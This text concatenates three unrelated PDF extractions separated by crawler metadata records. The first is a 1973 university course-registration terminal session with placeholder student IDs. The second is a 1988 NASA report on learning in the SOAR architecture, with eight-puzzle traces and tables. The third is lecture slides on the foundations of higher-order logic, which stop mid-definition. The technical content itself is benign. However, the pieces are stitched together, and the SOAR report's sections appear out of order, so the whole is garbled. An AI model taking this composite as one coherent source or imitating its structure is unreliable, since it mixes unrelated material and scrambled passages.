CREDIT HOURS FALL 6 *id 1234567899 ** NO RECORD: 123-45-6789-9 *insert 1234567899 name=wilson pickett fence unit=1 year=68 INSERT 123-45-6789-9 WILSON PICKETT FENCE 68 L ?ok DONE 10:05.43 *st 353 673 001 FALL 353 C C S 673 SYSTEMS PROGRAMMING SEC LIMITS ENROLLED AVAILABLE WAITING 001 MAX 21 CET 10 TOT 1 REG 9 PRI 11 REG 0 PRI 0 *id 1234567899 123-45-6789-9 WILSON PICKETT FENCE 68 L 10:07.31 01-29-73 *NO ELECTIONS FOR FALL * *ad 353 673 3 001 *ad 428 555 3 001 *ad 428 684 3 001 *hr 9 ECHO: 1 ADD 353 C C S 673 3 001 2 ADD 428 MATH 555 3 001 3 ADD 428 MATH 684 3 001 TOTAL CREDIT HOURS FALL 9 *update FALL ELECTIONS CONFIRMED FOR 9 HOURS CREDIT 10:08.51 *ELECTIONS FOR FALL * 1 353 C C S 673 3 001 2 428 MATH 555 3 001 3 428 MATH 684 3 001 TOTAL CREDIT HOURS FALL 9 D:0 A:3 W:0 N1:1 N2:0 K280 KEEP THIS, IT'S NOT LITTER *id 2145273192 214-52-7319-2 WIRE BARBARA 77 L 10:09.39 01-29-73 *ELECTIONS FOR FALL * *DROP 353 473 3 001 *AD 428 555 3 002 *HR 3 ECHO: 1 DROP 353 C C S 473 3 001 2 ADD 428 MATH 555 3 002 TOTAL CREDIT HOURS FALL 3 FALL ELECTIONS CONFIRMED FOR 6 HOURS CREDIT 10:11.02 ** CHECK HOURS! ENTERED: 3 CONFIRMED: 6 *ELECTIONS FOR FALL * 1 353 C C S 673 3 001 2 428 MATH 555 3 002 TOTAL CREDIT HOURS FALL 6 D:1 A:4 W:0 N2:1 K28D GUARD THIS WITH YOUR LIFE (IT IS YOUR LIFE) <table> <thead> <tr> <th>Course Code</th> <th>Course Title</th> <th>Section Code</th> <th>Enrollment</th> <th>Available</th> <th>Waiting</th> <th>HRS</th> </tr> </thead> <tbody> <tr> <td>353 673 001</td> <td>FALL 353 C C S</td> <td>001</td> <td>3</td> <td>0</td> <td>0</td> <td>15</td> </tr> <tr> <td></td> <td>673 SYSTEMS PROGRAMMING</td> <td></td> <td>REG 8</td> <td>PRI 11</td> <td></td> <td>3 TTHS 8PM</td> </tr> <tr> <td></td> <td></td> <td></td> <td>CET 10</td> <td>TOT 2</td> <td>REG 0</td> <td>2086 F B</td> </tr> <tr> <td>428 555 000-999</td> <td>FALL 428 MATH</td> <td>001</td> <td>3</td> <td>0</td> <td>0</td> <td>40</td> </tr> <tr> <td></td> <td>555 COMPLEX VARIABLES</td> <td></td> <td>REG 10</td> <td>PRI 30</td> <td></td> <td>1-3 MWF 10</td> </tr> <tr> <td></td> <td></td> <td></td> <td>CET 10</td> <td>TOT 1</td> <td>REG 0</td> <td>433 P A</td> </tr> </tbody> </table> *Invalid section number: 3 ** ALREADY ON FILE - 214-52-7319-2 WIRE BARBARA ** THE FOLLOWING COMMANDS WILL BE ACCEPTED: ID TE IN CH RE ST DI LC AC CC SE DC CA XC HE CO MT SY SI *EXECUTION TERMINATED References
{"Source-Url": "https://files.eric.ed.gov/fulltext/ED084839.pdf", "len_cl100k_base": 7244, "olmocr-version": "0.1.50", "pdf-total-pages": 28, "total-fallback-pages": 0, "total-input-tokens": 50565, "total-output-tokens": 8451, "length": "2e12", "weborganizer": {"__label__adult": 0.0007581710815429688, "__label__art_design": 0.0011835098266601562, "__label__crime_law": 0.0005235671997070312, "__label__education_jobs": 0.362548828125, "__label__entertainment": 0.0002579689025878906, "__label__fashion_beauty": 0.0003864765167236328, "__label__finance_business": 0.0012807846069335938, "__label__food_dining": 0.00093841552734375, "__label__games": 0.0013971328735351562, "__label__hardware": 0.00304412841796875, "__label__health": 0.0015039443969726562, "__label__history": 0.001377105712890625, "__label__home_hobbies": 0.0004191398620605469, "__label__industrial": 0.0010318756103515625, "__label__literature": 0.0013341903686523438, "__label__politics": 0.0004763603210449219, "__label__religion": 0.0012836456298828125, "__label__science_tech": 0.060211181640625, "__label__social_life": 0.0006890296936035156, "__label__software": 0.031005859375, "__label__software_dev": 0.525390625, "__label__sports_fitness": 0.000469207763671875, "__label__transportation": 0.0020084381103515625, "__label__travel": 0.0006036758422851562}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 34596, 0.10392]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 34596, 0.20378]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 34596, 0.94978]], "google_gemma-3-12b-it_contains_pii": [[0, 1274, false], [1274, 1471, null], [1471, 2315, null], [2315, 3717, null], [3717, 5415, null], [5415, 7059, null], [7059, 8581, null], [8581, 10288, null], [10288, 11927, null], [11927, 13636, null], [13636, 15168, null], [15168, 16895, null], [16895, 18466, null], [18466, 18587, null], [18587, 20166, null], [20166, 21907, null], [21907, 23647, null], [23647, 25606, null], [25606, 26778, null], [26778, 28271, null], [28271, 29808, null], [29808, 31411, null], [31411, 31675, null], [31675, 31701, null], [31701, 32730, null], [32730, 33203, null], [33203, 34244, null], [34244, 34596, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1274, true], [1274, 1471, null], [1471, 2315, null], [2315, 3717, null], [3717, 5415, null], [5415, 7059, null], [7059, 8581, null], [8581, 10288, null], [10288, 11927, null], [11927, 13636, null], [13636, 15168, null], [15168, 16895, null], [16895, 18466, null], [18466, 18587, null], [18587, 20166, null], [20166, 21907, null], [21907, 23647, null], [23647, 25606, null], [25606, 26778, null], [26778, 28271, null], [28271, 29808, null], [29808, 31411, null], [31411, 31675, null], [31675, 31701, null], [31701, 32730, null], [32730, 33203, null], [33203, 34244, null], [34244, 34596, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 34596, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 34596, null]], "pdf_page_numbers": [[0, 1274, 1], [1274, 1471, 2], [1471, 2315, 3], [2315, 3717, 4], [3717, 5415, 5], [5415, 7059, 6], [7059, 8581, 7], [8581, 10288, 8], [10288, 11927, 9], [11927, 13636, 10], [13636, 15168, 11], [15168, 16895, 12], [16895, 18466, 13], [18466, 18587, 14], [18587, 20166, 15], [20166, 21907, 16], [21907, 23647, 17], [23647, 25606, 18], [25606, 26778, 19], [26778, 28271, 20], [28271, 29808, 21], [29808, 31411, 22], [31411, 31675, 23], [31675, 31701, 24], [31701, 32730, 25], [32730, 33203, 26], [33203, 34244, 27], [34244, 34596, 28]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 34596, 0.07921]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
89c2e98065cd7a116d96714bcbfd38907a1a9ac6
PRODUCTION SYSTEM CHUNKING IN SOAR: CASE STUDIES IN AUTOMATED LEARNING Final Report NASA/ASEE Summer Faculty Fellowship Program -- 1988 Johnson Space Center Prepared By: Robert Allen, Ph.D. Academic Rank: Assistant Professor University & Department: University of Houston Dept. of Mechanical Engineering Houston, TX 77204-4792 NASA/JSC Directorate: Mission Support Division: Mission Planning and Analysis Branch: Technology Development and Applications JSC Colleague: Robert T. Savely Date Submitted: 27 July 1988 Contract Number: NGT 44-005-803 ABSTRACT A preliminary study of SOAR, a general intelligent architecture for automated problem solving and learning, is presented. The underlying principles of universal subgoaling and chunking were applied to a simple, yet representative, problem in artificial intelligence. A number of problem space representations were examined and compared. It is concluded that learning is an inherent and beneficial aspect of problem solving. Additional studies are suggested in domains relevant to mission planning, as well as, in aspects related to SOAR itself. available, the subgoal terminates and pops from the goal stack. The goal stack also serves as the anchor to information in working memory (WM). Each working memory element (WME) is connected to some goal in the stack and can be accessed only by specifying the connection from the goal to the WME via **augmentations**. An example of one such connection is: \[ \begin{align*} (\text{goal } <g> \ ^\text{state} <s>) \\ (\text{state } <s> \ ^\text{binding} <b>) \\ (\text{binding } <b> \ ^\text{cell c11} \ ^\text{tile t1}) \end{align*} \] where **state** and **binding** are the goal augmentations that provide the connection between the goal <g> and the value of the action attribute. A **chunking mechanism** is provided to summarize the system behavior in terms of subgoals, and also enables the system to learn aspects of problem solving related to subgoals. The overall architecture is presented in Figure 1. Some of the important characteristics of SOAR are: (1) separation between architecture level and the knowledge level; (2) problem-spaces for representing knowledge; (3) universal subgoaling to resolve impasses; and (4) production system representation that serves as access paths to information in long term memory. In addition, there is no conflict resolution mechanism in SOAR. All matched productions are fired "in parallel" and add one type of WMEs to the working memory. The process of collecting available information is called the **elaboration phase**. The second type of WME is the **preference element** that is used by the architecture in the **decision cycle** to determine the next goal context. The decision procedure, sketched in Figure 2, controls the elaboration and decision cycles. More detailed descriptions can be found elsewhere (1-3). **PROBLEM DOMAIN** SOAR's capabilities are illustrated below in an output trace of the problem-solving process for the "eight-puzzle" problem. The board in the eight-puzzle is represented by nine cells occupied by tiles numbered one through nine with one blank cell. The numbers on the beginning of each line are the decision cycle numbers; elaboration cycles are not shown. The **Build**:P notation signifies a INTRODUCTION SOAR is a production system architecture for a system capable of exhibiting general intelligence. SOAR has three principal characteristics separating it from other architectures. These are: (1) SOAR can be used to solve a range of problems, from routine problems to open-ended problems; (2) SOAR applies a wide range of problem-solving methods required for these tasks; and (3) SOAR learns about aspects of the problem-solving process and is capable of reporting about its performance. This document summarizes the work performed in implementing simple, yet representative, problems in SOAR. One purpose of this exercise was to be acquainted with the SOAR architecture and implementation. In the course of this work, some general issues were raised and found to coincide with current research topics in SOAR. This paper is organized as follows. First, a brief description of SOAR is presented. Next, some "toy" AI problems are briefly described and their implementations in SOAR are presented. Penultimately, a comparison of some problems decompositions is examined and the affect of problem presentation on learning and performance is discussed. Finally, future studies that can be performed are recommended. SOAR: AN OVERVIEW SOAR is an architecture for exhibiting general intelligent behavior. SOAR has evolved from a series of production system architectures (1,2). SOAR is embedded in about 255 kilobytes of LISP code, and extends 100 kilobytes of modified OPS5 code. In SOAR, each task is represented in problem-spaces. The problem solving process begins from an initial state, working through the state to subsequent states by applying operators. Stages in the problem solving process are characterized by a goal context, which consists of the current goal, problem-space, state and operator. When one stage in the problem-solving process does not have enough information, it creates a subgoal (hence the name "universal subgoaling") to collect the needed information. The new subgoal is then added to the goal stack that keeps track of the goals that were created for this problem-space. When the needed information is Soar Architecture Figure 1 Decision Procedure Elaboration Phase Decision 1 - Decision Procedure - Quiescence - Gather Preferences - Interpret Preferences - Impasse - Create Subgoal Decision 2 Selects State, Goal, Problem-space or Operator - No conflict resolution except refractory inhibition - Replace Context Object Figure 2 2-4b new chunk (rule) being created during the trace. The letters G, P, O and S represent the current goal, problem-space, operator and state, respectively. Learn status: on all-goals print trace 0 G: G1 1 P: P3 EIGHT-PUZZLE 2 S: S4 3 O: O34 MOVE-TILE(C22) C22(S4) $\rightarrow$ S35 <table> <thead> <tr> <th>2</th> <th>8</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>0</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> C22(S4) $\rightarrow$ S35 4 S: S35 5 $\Rightarrow$: G: G185 (UNDECIDED OPERATOR TIE) 6 P: P186 SELECTION 7 S: S42 8 O: (O47 O46 O45) 9 $\Rightarrow$: G: G190 (EVALUATE-OBJECT (MOVE-TILE(C21)) OPERATOR NO-CHANGE) 10 P: P3 EIGHT-PUZZLE 11 S: S35 12 O: O40 MOVE-TILE(C12) C21(S35) $\rightarrow$ S48 <table> <thead> <tr> <th>2</th> <th>0</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>8</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> C12(S35) --> S53 <table> <thead> <tr> <th>2</th> <th>8</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>1</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> Duplicate chunk Build: P200 Duplicate chunk Build: P202 Build: P204 Build: P205 13 S: S53 14 O: O41 MOVE-TILE(C21) C21(S35) --> S59 <table> <thead> <tr> <th>2</th> <th>0</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>8</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> 15 S: S59 16 O: O74 MOVE-TILE(C11) C11(S59) --> S64 <table> <thead> <tr> <th>0</th> <th>2</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>8</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> 2-6 17 S: S64 18 O: O76 MOVE-TILE(C12) C12(S64) --> S70 <table> <thead> <tr> <th>1</th> <th>2</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>8</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> 19 S: S70 20 O: O80 MOVE-TILE(C22) C22(S70) --> S77 <table> <thead> <tr> <th>1</th> <th>2</th> <th>3</th> </tr> </thead> <tbody> <tr> <td>0</td> <td>8</td> <td>4</td> </tr> <tr> <td>---</td> <td>---</td> <td>---</td> </tr> <tr> <td>7</td> <td>6</td> <td>5</td> </tr> </tbody> </table> 21 S: S77 goal SOLVE-EIGHT-PUZZLE achieved >(print-stats) Soar 4.4 (external release: created April 19, 1987) Run statistics on July 26, 1988 81 productions (1345 / 5703 nodes) 229.41667 seconds elapsed (43.133335 seconds chunking overhead) 21 decision cycles (10924.604 ms per cycle) 46 elaboration cycles (4987.319 ms per cycle) (2.1904762 e cycles/d cycle) 211 production firings (1087.2828 ms per firing) (4.5869565 productions in parallel) 717 RHS actions after initialization (319.96747 ms per action) 226 mean working memory size (339 maximum, 296 current) 2890 mean token memory size (10696 maximum, 3893 current) 22363 total number of tokens added 18470 total number of tokens removed 40833 token changes (5.6184134 ms per change) (56.7125 changes/action) The particular implementation of this problem in SOAR requires twelve productions, which can be divided as follows: (1) four rules for setting-up the problem space; (2) one rule to create an operator instantiation; (3) two rules for applying an instantiated operator; (4) one rule for search control; (5) one rule for monitoring states; and (6) three rules for evaluating operators. While the rules described are specific to this problem, encoding other tasks typically involve a similar division of a problem and hence a similar division of rules. LEARNING The chunk below is an example of a rule that becomes part of production memory during the session outlined above. In more transparent form the rule states: If any tile is being moved into its final position Then the next state will yield an evaluation of 1, i.e., the next state will be evaluated favorably This particular rule is one that is created because of the current implementation; the search control rule creates a worst preference for those operators not placing tiles in their desired locations. Other search control productions are responsible for the creation of chunks more in line with their method of search control (4). The search control rules are of importance in the outcome of the problem-solving process. To explore the effect of these rules on the parameters to measure performance, sample runs were performed using three different search control strategies. The results are presented in Table 1. The third column refers to a search control procedure that rejects an operator that will move back a tile into its previous location. The fourth column refers to a search control mechanism that creates a worst preference to a tile that is to be moved out of its desired location. The fifth column corresponds to no <table> <thead> <tr> <th>Type of run</th> <th>Data</th> <th>Reject * undo</th> <th>Worst * Preference</th> <th>No Search</th> </tr> </thead> <tbody> <tr> <td>No Learning</td> <td>number of productions</td> <td>73</td> <td>74</td> <td>82</td> </tr> <tr> <td></td> <td>elapsed time</td> <td>177</td> <td>53</td> <td>268</td> </tr> <tr> <td></td> <td>decision cycles</td> <td>48</td> <td>21</td> <td>39</td> </tr> <tr> <td></td> <td>elaboration cycles</td> <td>84</td> <td>43</td> <td>73</td> </tr> <tr> <td></td> <td>production firings</td> <td>442</td> <td>181</td> <td>383</td> </tr> <tr> <td></td> <td>working memory elements</td> <td>276</td> <td>301</td> <td>339</td> </tr> <tr> <td>Learning</td> <td>number of productions</td> <td>81</td> <td>77</td> <td>72</td> </tr> <tr> <td></td> <td>elapsed time</td> <td>112 (24)</td> <td>54 (9)</td> <td>281 (114)</td> </tr> <tr> <td></td> <td>decision cycles</td> <td>30</td> <td>21</td> <td>62</td> </tr> <tr> <td></td> <td>elaboration cycles</td> <td>55</td> <td>43</td> <td>94</td> </tr> <tr> <td></td> <td>production firings</td> <td>303</td> <td>182</td> <td>572</td> </tr> <tr> <td></td> <td>working memory elements</td> <td>323</td> <td>301</td> <td>453</td> </tr> <tr> <td>Learned</td> <td>number of productions</td> <td>81</td> <td>77</td> <td>82</td> </tr> <tr> <td></td> <td>elapsed time</td> <td>51 (0)</td> <td>28 (0)</td> <td>48 (0)</td> </tr> <tr> <td></td> <td>decision cycles</td> <td>12</td> <td>12</td> <td>12</td> </tr> <tr> <td></td> <td>elaboration cycles</td> <td>29</td> <td>25</td> <td>29</td> </tr> <tr> <td></td> <td>production firings</td> <td>120</td> <td>104</td> <td>116</td> </tr> <tr> <td></td> <td>working memory elements</td> <td>295</td> <td>279</td> <td>291</td> </tr> <tr> <td></td> <td>chunks used</td> <td>6</td> <td>3</td> <td>7</td> </tr> </tbody> </table> Table 1: Eight-Puzzle Results prespecified search control strategy. Each row contains data for each type of run. The data contain the number of productions in the system, the elapsed time to complete the task, the number of decision cycles, the number of elaboration cycles, the number of production firings and the maximum number of working memory elements. The last row, corresponding to runs that have already "learned," indicates the number of chunks that were fired during a problem solving session. The numbers in parentheses indicate the amount of time required for chunking. As expected, chunking added productions to each system. However, a learned system did not chunk again. Also as expected, a "stronger" search control mechanism (column Four) corresponded to a better overall performance: fewer cycles, fewer rule firings, more efficient memory and more efficient chunking. The reason for this is a priori control of the preferences in the "worst" preference strategy. Applying specific preference orientations in the search control strategy appears to be an effective way to structure a problem implementation (1,4). Finally, it is noted that even without a specified search control strategy (column Five), SOAR's default strategy is sufficient to solve this problem prior to chunking. **CONCLUSIONS** A preliminary examination of SOAR has been performed and, from the above-mentioned results, the following conclusions are drawn: - Learning is a beneficial aspect of automated problem solving in that code can be made more efficient and previously unrecognized knowledge, in the form of chunks, can be created. - Problem decomposition is the key to an efficient (or even successful implementation). The search control mechanism(s) used in a specific implementation strongly influences the problem-solving process and the learning process. • Measuring the difficulty of a problem is a nontrivial task. The performance criteria measured by SOAR need to be scrutinized before a definitive measure can be ascertained. It is clear that additional studies are needed, with more practical problems (such as those presented in (4)), to see if the SOAR architecture can be useful in NASA-related applications. Acknowledgment The author thanks Lui Wang, Aerospace Engineer for the Artificial Intelligence Section, for his assistance with using the microEXPLORER™ and the Lisp environment. References
{"Source-Url": "https://ntrs.nasa.gov/archive/nasa/casi.ntrs.nasa.gov/19890010689.pdf", "len_cl100k_base": 4134, "olmocr-version": "0.1.50", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 24288, "total-output-tokens": 4478, "length": "2e12", "weborganizer": {"__label__adult": 0.00033593177795410156, "__label__art_design": 0.0005574226379394531, "__label__crime_law": 0.0004248619079589844, "__label__education_jobs": 0.0045318603515625, "__label__entertainment": 0.00012683868408203125, "__label__fashion_beauty": 0.00021445751190185547, "__label__finance_business": 0.00037598609924316406, "__label__food_dining": 0.0003924369812011719, "__label__games": 0.0006642341613769531, "__label__hardware": 0.001944541931152344, "__label__health": 0.0005564689636230469, "__label__history": 0.00041365623474121094, "__label__home_hobbies": 0.00017380714416503906, "__label__industrial": 0.0010843276977539062, "__label__literature": 0.000415802001953125, "__label__politics": 0.0003752708435058594, "__label__religion": 0.0005049705505371094, "__label__science_tech": 0.254150390625, "__label__social_life": 0.00019490718841552737, "__label__software": 0.020782470703125, "__label__software_dev": 0.71044921875, "__label__sports_fitness": 0.0003256797790527344, "__label__transportation": 0.0008611679077148438, "__label__travel": 0.00022542476654052737}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 14664, 0.11403]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 14664, 0.28286]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 14664, 0.88828]], "google_gemma-3-12b-it_contains_pii": [[0, 551, false], [551, 1106, null], [1106, 3293, null], [3293, 5439, null], [5439, 5467, null], [5467, 5779, null], [5779, 6501, null], [6501, 6925, null], [6925, 7218, null], [7218, 8622, null], [8622, 9746, null], [9746, 11752, null], [11752, 13581, null], [13581, 14124, null], [14124, 14664, null]], "google_gemma-3-12b-it_is_public_document": [[0, 551, true], [551, 1106, null], [1106, 3293, null], [3293, 5439, null], [5439, 5467, null], [5467, 5779, null], [5779, 6501, null], [6501, 6925, null], [6925, 7218, null], [7218, 8622, null], [8622, 9746, null], [9746, 11752, null], [11752, 13581, null], [13581, 14124, null], [14124, 14664, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 14664, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 14664, null]], "pdf_page_numbers": [[0, 551, 1], [551, 1106, 2], [1106, 3293, 3], [3293, 5439, 4], [5439, 5467, 5], [5467, 5779, 6], [5779, 6501, 7], [6501, 6925, 8], [6925, 7218, 9], [7218, 8622, 10], [8622, 9746, 11], [9746, 11752, 12], [11752, 13581, 13], [13581, 14124, 14], [14124, 14664, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 14664, 0.27861]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
056043f62a944bc55101ffeb74b7f8314c7ae176
Overview of Chapter 3. Foundations of Higher-Order Logic 3.1 Introduction 3.2 Foundation of HOL 3.3 Conservative Extension of Theories Section 3.1 Introduction to higher-order logic Foundation of higher-order logic Conservative extension of theories 3. Foundations of Higher-Order Logic 3.1 Introduction A bit of history and context - Gottlob Frege proposed a system on which (he thought) all mathematics could be derived (in principle): Begriffsschrift (1879) - Bertrand Russell found paradox in Frege’s system and proposed the Ramified Theory of Types - Wrote Principia Mathematica with Whitehead, an attempt at developing basic mathematics completely formally ("My intellect never recovered from the strain") Russel’s paradox Theorem Let \( S = \{ x \mid x \notin x \} \), then \( S \in S \) if and only if \( S \notin S \) Proof. - If \( S \in S \), then \( S \notin S \). - If \( S \notin S \), then \( S \in S \). Remark - Thus, we found a mathematical contradiction. - Logical point of view: we derived \( F \leftrightarrow \neg F \) where \( F \equiv (S \in S) \); thus, we can derive \( False \), and consequently, every formula. Approaches to avoid inconsistencies - Type theory: - Russel: Use a hierarchy of types to avoid self-referential expressions - A. Church proposed a simple type theory (1940) - many approaches extend Church’s type theory (HOL, Calculus of constructions, etc.) - Set theory is often seen as the basis for mathematics. - Zermelo-Fraenkel, Bernays-Goedel, … - Set theories distinguish between sets and classes. - Consistency maintained as some collections are „too big“ to be sets, e.g., class of all sets is not a set. A class cannot belong to another class (let alone a set)! Set theory Aspects of HOL - Higher-order logic (HOL) is an expressive foundation for - mathematics: analysis, algebra, … - computer science: program correctness, hardware verification, … - Reasoning in HOL is classical. - Still important: modeling of problems (now in HOL). - Still important: deriving relevant reasoning principles. Remark Web-page listing approaches to formalize mathematics and logics: Aspects of HOL (2) - HOL offers safety through strength: ▶ small kernel of constants and axioms ▶ safety via conservative (definitional) extensions - Contrast with ▶ weaker logics (e.g., propositional logic, FOL): can’t define much ▶ axiomatic extensions: can lead to inconsistency Bertrand Russell: “The method of “postulating” what we want has many advantages; they are the same as the advantages of theft over honest toil.” (Introduction to Mathematical Philosophy, 1919) Choice of Isabelle/HOL Rationale for Isabelle/HOL We use Isabelle/HOL, the HOL specialization of the generic proof assistant Isabelle: - HOL vs. set theory: ▶ types are helpful for computer science applications ▶ HOL is sufficiently expressive for most applications (in general, ZF set theory is more expressive) ▶ “If you prefer ML to Lisp, you will probably prefer HOL to ZF” (quote by Larry Paulson) - Isabelle/HOL vs. other HOL systems: pragmatic advantages over the HOL system or PVS - Constructive alternatives for HOL: Coq or Nuprl, classical reasoning not supported About the term „higher-order logic“ 1st-order: supports functions and predicates over individuals (0th-order objects) and quantification of individuals: \[ \forall x, y. R(x, y) \rightarrow R(y, x) \] 2nd-order: supports functions and predicates that have first-order functions as arguments or results and allow quantification over first-order predicates and functions: \[ \forall P. \forall m. P(0) \land (\forall n. P(n) \rightarrow P(Suc(n))) \rightarrow P(m) \] “higher order” \( \leftrightarrow \) union of all finite orders Foundation of HOL Starting remarks Simplification In the rest of this chapter, we only consider - a core syntax of HOL (not the rich syntax of Isabelle/HOL) - a version of HOL without parameterized types (not the richer type system of Isabelle/HOL; cf. [GordonMelham93] for a version with parametric polymorphism) Goals: - Learn the semantics and axiomatic foundation of HOL - Learn some meta-level properties about HOL - Deepen the understanding of what verification is about Basic HOL Syntax (1) - Types: \[ \tau ::= \text{bool} | \text{ind} | \tau \Rightarrow \tau \] - \text{bool} and \text{ind} are also called \( o \) and \( i \) in the literature [Chu40, And86] - no user-defined type constructors, e.g., \text{bool} list - no polymorphic type definitions, e.g., \( \alpha \) list - Terms: Let \( \mathcal{V} \) be a set of variables and \( C \) a set of constants: \[ T ::= \mathcal{V} | C | (TT) | \lambda \mathcal{V}.T \] - Terms are simply typed (no type parameters) - Terms of type \text{bool} are called (well-formed) formulas. HOL Semantics - Intuitively an extension of many-sorted semantics with functions - FOL (w/o sorts): formulas are interpreted in a structure consisting of a domain/universe and functions/predicates \[ \langle D, (f_i)_{i \in F}, (p_i)_{i \in P} \rangle \] - Many-sorted FOL: there is a domain for each sort \( s \in S \) where \( S \) is finite; functions/predicates have a sorted signature: \[ \langle (D_s)_{s \in S}, (f_i)_{i \in F_s}, (p_i)_{i \in P_s} \rangle \] - HOL: domain \( D \) is indexed by (infinitely many) types - Our presentation ignores polymorphism on the object-logical level, it is treated on the meta-level, though (for a version covering object-level parametric polymorphism cf. [GordonMelham93]). Universes are prerequisite for HOL models **Definition (Universe)** A collection of sets \( \mathcal{U} \) is called a universe, if it satisfies the following closure conditions: - **Inhab**: Each \( X \in \mathcal{U} \) is a nonempty set - **Sub**: If \( X, Y \in \mathcal{U} \) and \( Y \neq \emptyset \subseteq X \), then \( Y \in \mathcal{U} \) - **Prod**: If \( X, Y \in \mathcal{U} \) then \( X \times Y \in \mathcal{U} \) where \( X \times Y \) is the Cartesian product \( \{\{x\}, \{x, y\}\} \) encodes \( (x, y) \) - **Pow**: If \( X \in \mathcal{U} \) then \( \mathcal{P}(X) = \{Y : Y \subseteq X\} \in \mathcal{U} \) - **Infty**: \( \mathcal{U} \) contains an infinite set of individuals Remarks on universes \( \mathcal{U} \) - **Representation of function spaces in universes**: \( X \Rightarrow Y \) is the set of all (total) functions from \( X \) to \( Y \) where a function is represented by its graph - **For** \( X \) and \( Y \) nonempty, \( X \Rightarrow Y \) is a nonempty subset of \( \mathcal{P}(X \times Y) \) - **From closure conditions**: If \( X, Y \in \mathcal{U} \), then \( X \Rightarrow Y \in \mathcal{U} \). - **Universes have two distinguished sets**: - **Unit**: A distinguished set \( \{1\} \) with exactly one element - **Bool**: A distinguished set \( \{T, F\} \) with exactly two element sets (existence follows from Infty and Sub) Frames **Definition (frame)** Let \( \mathcal{U} \) be a universe. A frame is a collection \((\mathcal{D}_\alpha)_{\alpha \in \tau}\) with \( \mathcal{D}_\alpha \in \mathcal{U} \) for all \( \alpha \in \tau \) and - \( \mathcal{D}_{\text{bool}} = \{T, F\} \) - \( \mathcal{D}_{\text{ind}} = X \) where \( X \) is some infinite set of individuals - \( \mathcal{D}_{\Rightarrow} \subseteq \mathcal{D}_\alpha \Rightarrow \mathcal{D}_\beta \), i.e. some collection of functions from \( \mathcal{D}_\alpha \) to \( \mathcal{D}_\beta \) Examples Some of the subsets \( \mathcal{D}_{\Rightarrow} \) might contain, e.g., - the identity function, others do not - only the computable functions Interpretations **Definition (Interpretation)** An interpretation \((\mathcal{D}_\alpha)_{\alpha \in \tau}, \mathcal{J})\) consists of a frame \((\mathcal{D}_\alpha)_{\alpha \in \tau}\) and a function \( \mathcal{J} \) mapping the constants of type \( \alpha \) to elements of \( \mathcal{D}_\alpha \): - \( 